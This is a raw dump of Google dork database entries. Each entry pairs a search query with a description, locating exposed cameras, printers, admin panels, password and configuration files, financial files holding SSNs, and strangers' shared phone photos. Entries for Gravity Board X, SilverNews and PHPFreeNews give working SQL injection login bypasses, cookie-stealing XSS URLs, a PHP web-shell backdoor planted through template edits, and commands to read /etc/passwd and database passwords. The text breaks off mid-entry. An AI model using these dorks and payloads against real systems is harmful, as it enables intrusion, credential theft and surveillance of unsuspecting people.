[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&q=intitle%3A%22PHPstat%22+intext%3A%22Browser%22+intext%3A%22PHPstat+setup%22&btnG=Search[url]] [[dork]intitle:"PHPstat" intext:"Browser" intext:"PHPstat setup"[dork]] [end][1303]] [[start][1304] [[title]"portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com[[title]] [[descr]A vulnerability has been found in the "id" parameter. Whatever value is passed in this variable, it is possible to replace it with a ' character.
Since this parameter is used in all modules, all of them are vulnerable.
This happens because the id parameter is not filtered at all.

Examples

http://example/index.php?affiche=News&id='[SQL inj]
http://example/index.php?affiche=File&id='[SQL inj]
http://example/index.php?affiche=Liens&id='[SQL inj]
http://example/index.php?affiche=Faq&id='[SQL inj]

The conclusion

The vulnerability was found in version 1.3; other versions
were not checked. Probably they are vulnerable too. [descr]] [[url]http://www.google.com/search?q=%22portailphp+v1.3%22+inurl:%22index.php%3Faffiche%22+inurl:%22PortailPHP%22+-site:safari-msi.com&filter=0[url]] [[dork]"portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com[dork]] [end][1304]] [[start][1305] [[title]+intext:"powered by MyBulletinBoard"[title]] [[descr]MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB) <= 1.00 RC4. Related advisory:

Patch: http://www.mybboard.com/community/showthread.php?tid=2559
http://fain182.badroot.org
http://www.codebug.org
Discovered by Alberto Trivero and coded with FAiN182
More Details: http://www.milw0rm.com/id.php?id=1022[descr]] [[url]http://www.google.com/search?q=%2Bintext%3A%22powered+by+MyBulletinBoard%22&btnG=Search&hl=en&lr=&safe=off&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial[url]] [[dork]+intext:"powered by MyBulletinBoard"[dork]] [end][1305]] [[start][1306] [[title]inurl:"S=320x240" | inurl:"S=160x120" inurl:"Q=Mobile"[title]] [[descr]Mobile cameras? Not sure what camera type this is for, but they are all from Asia and no password is required to view them; multiple cams and camera views. The &N=* at the end of the URL changes the language of the camera control links; &N=0 is English.
This is a slightly modified version of WarChylde's query, which gives more results.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22S%3D320x240%22+%7C+inurl%3A%22S%3D160x120%22+inurl%3A%22Q%3DMobile%22[url]] [[dork]inurl:"S=320x240" | inurl:"S=160x120" inurl:"Q=Mobile"[dork]] [end][1306]] [[start][1307] [[title]intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin[[title]] [[descr]This query reveals login pages for the administration of XcAuction and XcClassified Lite.

"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site."

"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features."descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1307]] [[start][1308] [[title]inurl:XcCDONTS.asp[[title]] [[descr]This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious![descr]] [[url]http://www.google.com/search?q=inurl%3AXcCDONTS.asp[url]] [[dork]inurl:XcCDONTS.asp[dork]] [end][1308]] [[start][1309] [[title]intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"[title]] [[descr]This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file.[descr]] [[url]http://www.google.com/search?q=intext:%22SteamUserPassphrase%3D%22+intext:%22SteamAppUser%3D%22+-%22username%22++-%22user%22&filter=0[url]] [[dork]intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"[dork]] [end][1309]] [[start][1311] [[title]inurl:"CgiStart?page="[title]] [[descr]This search reveals even more Panasonic IP cameras![descr]] [[url]http://www.google.com/search?hl=en&lr=&rls=GGLG%2CGGLG%3A2005-22%2CGGLG%3Aen&q=inurl%3A%22CgiStart%3Fpage%3D%22&btnG=Search[url]] [[dork]inurl:"CgiStart?page="[dork]] [end][1311]] [[start][1312] [[title]intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo[[title]] [[descr]Description of Vulnerabilities

Multiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.

If the "/flatnuke/foot_news.php" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.

[..]

User-supplied input passed to the "image" parameter in the "thumb.php" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.

It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters.[descr]] [[url]http://www.google.com/search?q=intext%3A%22Powered+by+flatnuke-2.5.3%22+%2B%22Get+RSS+News%22+-demo[url]] [[dork]intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo[dork]] [end][1312]] [[start][1315] [[title]inurl:pass.dat[[title]] [[descr]Accesses passwords, mostly in cgi-bin but not all the time.
Can find passwords + usernames (sometimes username), some unencrypted, some not.[descr]] [[url]http://www.google.com/search?q=filetype%3Adat+inurl%3Apass.dat&btnG=Search[url]] [[dork]filetype:dat inurl:pass.dat[dork]] [end][1315]] [[start][1316] [[title]intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee[[title]] [[descr]This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details.[descr]] [[url]http://www.google.com/search?num=100&q=intext%3A%22Welcome+to%22+inurl%3A%22cp%22+intitle%3A%22H-SPHERE%22+inurl%3A%22begin.html%22+-Fee[url]] [[dork]intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee[dork]] [end][1316]] [[start][1317] [[title]intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"[title]] [[descr]This will look through default phpinfo pages for ones that have a default MySQL password.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22phpinfo%28%29%22+%2B%22mysql.default_password%22+%2B%22Zend+Scripting+Language+Engine%22[url]] [[dork]intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"[dork]] [end][1317]] [[start][1318] [[title]intitle:"configuration" inurl:port_0[[title]] [[descr]More Dell and Lexmark printers, the usual things included.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22configuration%22+inurl%3Aport_0&btnG=Search[url]] [[dork]intitle:"configuration" inurl:port_0[dork]] [end][1318]] [[start][1319] [[title]intitle:"Dell Laser Printer M5200" port_0[[title]] [[descr]Dell Laser Printer M5200[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&as_qdr=all&q=intitle%3A%22Dell+Laser+Printer+M5200%22+port_0&btnG=Search[url]] [[dork]intitle:"Dell Laser Printer M5200" port_0[dork]] [end][1319]] [[start][1320] [[title]printers/printman.html[[title]] [[descr]Some interesting information on printer status 
including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=printers%2Fprintman.html&btnG=Google+Search[url]] [[dork]printers/printman.html[dork]] [end][1320]] [[start][1321] [[title]"RICOH Network Printer D model-Restore Factory"[title]] [[descr]Not a whole lot here.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22RICOH+Network+Printer+D+model-Restore+Factory%22&btnG=Search[url]] [[dork]"RICOH Network Printer D model-Restore Factory"[dork]] [end][1321]] [[start][1322] [[title]intitle:"GCC WebAdmin" -gcc.ru[[title]] [[descr]All sorts of various printer status information[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22GCC+WebAdmin%22+-gcc.ru&btnG=Search[url]] [[dork]intitle:"GCC WebAdmin" -gcc.ru[dork]] [end][1322]] [[start][1323] [[title]intitle:"XMail Web Administration Interface" intext:Login intext:password[[title]] [[descr]This search will find the Web Administration Interface for servers running XMail.

"XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking", etc...[descr]] [[url]http://www.google.com/search?q=intitle:%22XMail+Web+Administration+Interface%22+intext:Login+intext:password[url]] [[dork]intitle:"XMail Web Administration Interface" intext:Login intext:password[dork]] [end][1323]] [[start][1324] [[title]intitle:"AXIS 240 Camera Server" intext:"server push" -help[[title]] [[descr]This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based.[descr]] [[url]http://www.google.com/search?q=intitle:%22AXIS+240+Camera+Server%22+intext:%22server+push%22+-help&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&start=10&sa=N&filter=0[url]] [[dork]intitle:"AXIS 240 Camera Server" intext:"server push" -help[dork]] [end][1324]] [[start][1325] [[title]"html allowed" guestbook[[title]] [[descr]When this is typed in google it finds websites which have HTML Enabled guestbooks.

This is really stupid as users could totally mess up their guestbook by adding commands like

or adding a loop JavaScript pop-up.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22html+allowed%22+guestbook&btnG=Search[url]] [[dork]"html allowed" guestbook[dork]] [end][1325]] [[start][1326] [[title]"Status message received from" intitle:big brother[[title]] [[descr]This search will help you find server stats and reports via Big Brother. Lots of information can be gained from the reports. An attacker can use this information to help him in planning his attacks.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1326]] [[start][1327] [[title]intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03"[title]] [[descr]Snitz Forum 2000 v3.4.03 and older is vulnerable to many things, including XSS. See http://www.gulftech.org/?node=research&article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well.[descr]] [[url]http://www.google.com/search?num=100&safe=off&q=intext%3A%22Powered+By%3A+Snitz+Forums+2000+Version+3.4.00..03%22&btnG=Search[url]] [[dork]intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03"[dork]] [end][1327]] [[start][1328] [[title]filetype:QBW qbw[[title]] [[descr]QuickBooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. It's a nice software package, but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection.

SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available.
This could lead to identity theft, or worse...[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&biw=1400&q=filetype%3AQBW+qbw&btnG=Search[url]] [[dork]filetype:QBW qbw[dork]] [end][1328]] [[start][1329] [[title]inurl:cgi-bin inurl:calendar.cfg[[title]] [[descr]CGI Calendar (Perl) configuration file reveals information including passwords for the program.[descr]] [[url]http://www.google.com/search?q=inurl%3Acgi-bin+inurl%3Acalendar.cfg[url]] [[dork]inurl:cgi-bin inurl:calendar.cfg[dork]] [end][1329]] [[start][1330] [[title]inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"[title]] [[descr]i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.
http://www.packetstormsecurity.org/0506-exploits/igallery33.txt[descr]] [[url]http://www.google.com/search?q=inurl%3A%22%2Flogin.asp%3Ffolder%3D%22+%22Powered+by%3A+i-Gallery+3.3%22[url]] [[dork]inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"[dork]] [end][1330]] [[start][1331] [[title]intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event"[title]] [[descr]This search finds all pages that allow you to add events in Matt Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques.[descr]] [[url]http://www.google.com/search?q=intext%3A%22Calendar+Program+%C2%A9+Copyright+1999+Matt+Kruse%22+%22Add+an+event%22&btnG=Search[url]] [[dork]intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event"[dork]] [end][1331]] [[start][1332] [[title]intitle:"Login to Cacti"[title]] [[descr]Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality. 
[descr]] [[url]http://www.google.com/search?hl=en&lr=&biw=1003&q=intitle%3A%22Login+to+Cacti%22[url]] [[dork]intitle:"Login to Cacti"[dork]] [end][1332]] [[start][1333] [[title]"set up the administrator user" inurl:pivot[[title]] [[descr]Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog.[descr]] [[url]http://www.google.com/search?q=%22set+up+the+administrator+user%22+inurl%3Apivot[url]] [[dork]"set up the administrator user" inurl:pivot[dork]] [end][1333]] [[start][1334] [[title]inurl:textpattern/index.php[[title]] [[descr]Login portal for textpattern a CMS/Blogger tool.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1334]] [[start][1335] [[title]tilt intitle:"Live View / - AXIS" | inurl:view/view.shtml[[title]] [[descr]A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun![descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=tilt+intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml&btnG=Search[url]] [[dork]tilt intitle:"Live View / - AXIS" | inurl:view/view.shtml[dork]] [end][1335]] [[start][1336] [[title] site:pictures.sprintpcs.com "picture.do;jsessionid="[title]] [[descr]Searches the sprint pcs site for shared cell phone pics and movies. The returned search returns movies, pics, and email addresses. <br> <br> some Sprint pcs email addresses are actually the cell phone numbers. 
Email addresses appearing like 123456789@messaging.sprintpcs.com = "not a real one" would be the cell phone number (123)-456-6789 of that user.

Secondary Google search: site:pictures.sprintpcs.com "large.do;jsessionid="

will return photo albums without the added personal info on the users.

This can just be used for information gathering.[descr]] [[url]http://www.google.com/search?hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=+site%3Apictures.sprintpcs.com++%22picture.do%3Bjsessionid%3D%22&btnG=Search[url]] [[dork] site:pictures.sprintpcs.com "picture.do;jsessionid="[dork]] [end][1336]] [[start][1337] [[title]"powered by PhpBB 2.0.15" -site:phpbb.com[[title]] [[descr]Another PHP vulnerability, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.php

phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
This exploit gives the user all the details about the database
connection such as database host, username, password and
database name.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+PhpBB+2.0.15%22+-site%3Aphpbb.com&btnG=Search[url]] [[dork]"powered by PhpBB 2.0.15" -site:phpbb.com[dork]] [end][1337]] [[start][1338] [[title]filetype:PS ps[[title]] [[descr]PS is for "PostScript"... which basically means you get the high quality press data for documents. Just run 'Adobe Distiller' or the like to produce a readable PDF. Found items include complete books as sold on Amazon, annual reports and even juicier stuff.[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3APS+ps[url]] [[dork]filetype:PS ps[dork]] [end][1338]] [[start][1342] [[title]"You have requested access to a restricted area of our website. Please authenticate yourself to continue."[title]] [[descr]Background

EasySite is a Content Management System (CMS) built on PHP and MySQL.
Many EasySite servers still use the default username and password; however, all of them have been contacted about this problem.[descr]] [[url]http://www.google.com/search?q=%22You+have+requested+access+to+a+restricted+area+of+our+website.+Please+authenticate+yourself+to+continue.%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"You have requested access to a restricted area of our website. Please authenticate yourself to continue."[dork]] [end][1342]] [[start][1343] [[title]intitle:"pictures thumbnails" site:pictures.sprintpcs.com[[title]] [[descr]This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website.
This search exposes the thumbnail album, only if the user has elected to share the photo album.

Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriends and so on.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22pictures+thumbnails%22+site%3Apictures.sprintpcs.com[url]] [[dork]intitle:"pictures thumbnails" site:pictures.sprintpcs.com[dork]] [end][1343]] [[start][1345] [[title]allinurl:cdkey.txt[[title]] [[descr]cdkeys[descr]] [[url]http://www.google.com/search?q=allinurl%3Acdkey.txt[url]] [[dork]allinurl:cdkey.txt[dork]] [end][1345]] [[start][1346] [[title]intitle:"TANDBERG" "This page requires a frame capable browser!"[title]] [[descr]Tandberg is a manufacturer of videoconferencing equipment. A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously. 
[descr]] [[url]http://www.google.com/search?q=intitle:%22TANDBERG%22+%22This+page+requires+a+frame+capable+browser!%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"TANDBERG" "This page requires a frame capable browser!"[dork]] [end][1346]] [[start][1347] [[title]intitle:"Middle frame of Videoconference Management System" ext:htm[[title]] [[descr]Tandberg is a manufacturer of videoconferencing equipment. A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Middle+frame+of+Videoconference+Management+System%22+ext%3Ahtm&btnG=Search[url]] [[dork]intitle:"Middle frame of Videoconference Management System" ext:htm[dork]] [end][1347]] [[start][1348] [[title]intitle:"Veo Observer Web Client"[title]] [[descr]Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append "LGI_en.htm" to the URL for the English version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very clearly warns owners to change that.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Veo+Observer+Web+Client%22&btnG=Search[url]] [[dork]intitle:"Veo Observer Web Client"[dork]] [end][1348]] [[start][1349] [[title]intitle:"TOPdesk ApplicationServer"[title]] [[descr]TOPdesk is some kind of incident ticket system with a web interface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called Jetty/4.2.2, and the default password (operator login) is admin/admin.
The HTTP server header reveals the OS it's running on.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22TOPdesk+ApplicationServer%22&btnG=Search[url]] [[dork]intitle:"TOPdesk ApplicationServer"[dork]] [end][1349]] [[start][1350] [[title]intitle:"Welcome to Mailtraq WebMail"[title]] [[descr]Mailtraq WebMail is just another web-based e-mail client. This is the login page.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Welcome+to+Mailtraq+WebMail%22[url]] [[dork]intitle:"Welcome to Mailtraq WebMail"[dork]] [end][1350]] [[start][1351] [[title]intitle:"Java Applet Page" inurl:ml[[title]] [[descr]Another standalone network camera.

Default login: remove wg_jwebeye.ml to get a nice clue.
Server: wg_httpd/1.0(based Boa/0.92q)[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Java+Applet+Page%22+inurl%3Aml+&num=100[url]] [[dork]intitle:"Java Applet Page" inurl:ml [dork]] [end][1351]] [[start][1352] [[title]intitle:"WEBDVR" -inurl:product -inurl:demo[[title]] [[descr]DVR is a generic name used to describe the recording process with a digital cam (digital video recording). This search finds several manufacturers like Kodicom DVR Systems, i3 DVR, and others I can't identify.[descr]] [[url]http://www.google.com/search?q=intitle:%22WEBDVR%22+-inurl:product+-inurl:demo&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"WEBDVR" -inurl:product -inurl:demo[dork]] [end][1352]] [[start][1353] [[title]"This section is for Administrators only. If you are an administrator then please"[title]] [[descr]Nothing special, just one more set of login pages, but the "Administrators only" line is a classic.[descr]] [[url]http://www.google.com/search?q=%22This+section+is+for+Administrators+only.+If+you+are+an+administrator+then+please%22&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]] [[dork]"This section is for Administrators only. If you are an administrator then please"[dork]] [end][1353]] [[start][1354] [[title]intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi[[title]] [[descr]Pretty standard login pages; they all have various differences, but it appears that they use the same script or software.[descr]] [[url]http://www.google.com/search?q=intitle:%22Member+Login%22+%22NOTE:+Your+browser+must+have+cookies+enabled+in+order+to+log+into+the+site.%22+ext:php+OR+ext:cgi&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi[dork]] [end][1354]] [[start][1355] [[title]site:www.mailinator.com inurl:ShowMail.do[[title]] [[descr]Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address, which can be randomized. [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=site%3Awww.mailinator.com+inurl%3AShowMail.do[url]] [[dork]site:www.mailinator.com inurl:ShowMail.do[dork]] [end][1355]] [[start][1356] [[title]filetype:mdb "standard jet"[title]] [[descr]These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data.[descr]] [[url]http://www.google.com/search?q=filetype%3Amdb+%22standard+jet%22+%28password+%7C+username+%7C+user+%7C+pass%29&btnG=Search[url]] [[dork]filetype:mdb "standard jet" (password | username | user | pass)[dork]] [end][1356]] [[start][1357] [[title]inurl:"default/login.php" intitle:"kerio"[title]] [[descr]This dork reveals login pages for Kerio MailServer. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. 
Download can be found here http://www.kerio.com/kms_download.html.[descr]] [[url]http://www.google.com/search?as_q=intitle%3Akerio&num=100&hl=en&c2coff=1&btnG=Google+Search&as_epq=inurl%3Adefault+login+php+&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images[url]] [[dork]intitle:kerio[dork]] [end][1357]] [[start][1358] [[title]ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential[[title]] [[descr]Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information. [descr]] [[url]http://www.google.com/search?q=ext:(doc+%7C+pdf+%7C+xls+%7C+txt+%7C+ps+%7C+rtf+%7C+odt+%7C+sxw+%7C+psw+%7C+ppt+%7C+pps+%7C+xml)+(intext:confidential+salary+%7C+intext:%22budget+approved%22)+inurl:confidential[url]] [[dork]ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential[dork]] [end][1358]] [[start][1359] [[title][WFClient] Password= filetype:ica[[title]] [[descr]The WinFrame-Client infos needed by users to connect to<br> Citrix Application Servers (e.g. Metaframe).<br> Often linked/stored on Webservers and sometimes reachable from Internet.<br> Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).<br> File Extension is "ica" the so called Citrix® Independent Computing Architecture.<br> <br> These files may contain login information (Username, Password, Domain).[descr]] [[url]http://www.google.com/search?q=%5BWFClient%5D+Password%3D+filetype%3Aica[url]] [[dork][WFClient] Password= filetype:ica[dork]] [end][1359]] [[start][1360] [[title]intitle:"V1" "welcome to phone settings" password[[title]] [[descr]This is a small search for the Italk BB899 Phone Adaptor login page. 
iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.<br> <br> Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321. [descr]] [[url]http://www.google.com/search?q=intitle:%22V1%22+%22welcome+to+phone+settings%22+password&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"V1" "welcome to phone settings" password[dork]] [end][1360]] [[start][1361] [[title]intitle:"HP ProCurve Switch *" "This product requires a frame capable browser."[title]] [[descr]HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details).[descr]] [[url]http://www.google.com/search?q=intitle:%22HP+ProCurve+Switch+*%22+%22This+product+requires+a+frame+capable+browser.%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"HP ProCurve Switch *" "This product requires a frame capable browser."[dork]] [end][1361]] [[start][1362] [[title]"Powered by Gravity Board"[title]] [[descr]4.22 07/08/2005 <br> <br> Gravity Board X v1.1 (possibly prior versions) <br> Remote code execution, SQL Injection / Login Bypass, cross site scripting, path <br> disclosure poc <br> <br> software: <br> author site: http://www.gravityboardx.com/ <br> <br> <br> a) Sql Injection / Login Bypass: <br> <br> If magic_quotes off, A user can bypass login check and grant administrator privileges on target <br> system: <br> <br> login: ' or isnull(1/0) /* <br> password: whatever <br> <br> <br> <br> b) Cross site scripting poc: <br> <br> b.1)After he login as administrator he can edit template to insert evil javascript <br> code. 
Try to insert at the end of the template these lines: <br> <br> </STYLE> <br> alert(document.cookie) <br> <br> b.2)A user can craft a malicious url like this to access target user cookies: <br> <br> http://[target]/[path]/deletethread.php?board_id=">alert(document.cookie) <br> <br> <br> <br> c) Remote commands/php code execution: <br> <br> c.1) Always editing the template, attacker can leave a backdoor in target system, <br> example, at the end of template: <br> <br> </STYLE> <br> <?php <br> error_reporting(0); //to show no errors when page is called normally <br> system($HTTP_GET_VARS[cmd]); <br> ?> <br> <br> After, the attacker can launch commands by this urls: <br> <br> http://[target]/[path]/index.php?cmd=ls%20-la <br> <br> to list directories... <br> <br> http://[target]/[path]/index.php?cmd=cat%20/etc/passwd <br> <br> to see Unix /etc/passwd file <br> <br> http://[target]/[path]/index.php?cmd=cat%20config.php <br> <br> to see database username/password <br> <br> c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling <br> editcss.php script, look at the code of this script: <br> <br> if($fp = fopen('gbxfinal.css','w')){ <br> fwrite($fp, $csscontent); <br> fclose($fp); <br> echo ''; <br> }else{ <br> echo 'Gravity Board X was unable to save changes to the CSS template.'; <br> } <br> <br> you can easily deface the forum and/or insert a backdoor calling an url like this: <br> <br> http://[target]/[path]/editcss.php?csscontent=</style><?php%20system($HTTP_GET_VARS[cmd]);%20?> <br> <br> then execute commands: <br> <br> http://[target]/[path]/index?cmd=[command] <br> <br> It's also possible to disclose path: <br> <br> d) path disclosure: <br> <br> http://[target]/[path]/deletethread.php?perm=1 <br> http://[target]/[path]/ban.php <br> http://[target]/[path]/addnews.php <br> http://[target]/[path]/banned.php <br> http://[target]/[path]/boardstats.php <br> http://[target]/[path]/adminform.php <br> 
http://[target]/[path]/forms/admininfo.php <br> http://[target]/[path]/forms/announcements.php <br> http://[target]/[path]/forms/banform.php <br> <br> ans so on...calling scripts in /forms directory <br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+by+Gravity+Board%22&btnG=Cerca+con+Google&meta=[url]] [[dork]"Powered by Gravity Board"[dork]] [end][1362]] [[start][1363] [[title]"Powered by SilverNews"[title]] [[descr]Silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting <br> <br> software: <br> author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews <br> <br> <br> SQL Injection / Login bypass: <br> <br> A user can bypass admin password check, if magic_quotes is set to off: <br> <br> user: ' or isnull(1/0) /* <br> pass: whatever <br> <br> <br> remote commands execution: <br> <br> now, new admin can edit template, clicking on Templates -> Global footer, can <br> add the lines: <br> <br> //*********************************************** <br> </body> <br> </html> <br> <br> TEMPLATE; <br> } <br> } <br> system($HTTP_GET_VARS[command]); <br> <br> /* <br> <br> to leave a backdoor in template file /templates/tpl_global.php <br> now can launch system commands on the target system with theese urls: <br> <br> http://[target]/[path]//templates/tpl_global.php?command=ls%20-la <br> <br> <br> to list directories <br> <br> http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd <br> <br> to see /etc/passwd file <br> <br> http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php <br> <br> to see Mysql database password <br> <br> <br> cross site scripting: <br> <br> same way, a user can hide evil javascript code in template [descr]] [[url]http://www.google.com/search?hl=it&c2coff=1&q=%22Powered+by+SilverNews%22&btnG=Cerca&lr=[url]] [[dork]"Powered by SilverNews"[dork]] [end][1363]] [[start][1364] [[title]PHPFreeNews 
inurl:Admin.php[[title]] [[descr]29/07/2005 8.36.03<br> <br> PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure <br> <br> <br> author site: http://www.phpfreenews.co.uk/Main_Intro.php<br> <br> xss poc:<br> http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=")}//-->alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=")}//-->alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=")}//-->alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=")}//-->alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=")}//-->alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=")}//-->alert(document.cookie)<br> http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=")}//-->alert(document.cookie)<br> <br> also a user can craft a url to redirect a victim to an evil site:<br> <br> http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]<br> <br> path disclosure:<br> <br> http://[target]/[path]/inc/ArchiveOldNews.php<br> http://[target]/[path]/inc/Categories.php<br> http://[target]/[path]/inc/CheckLogout.php<br> 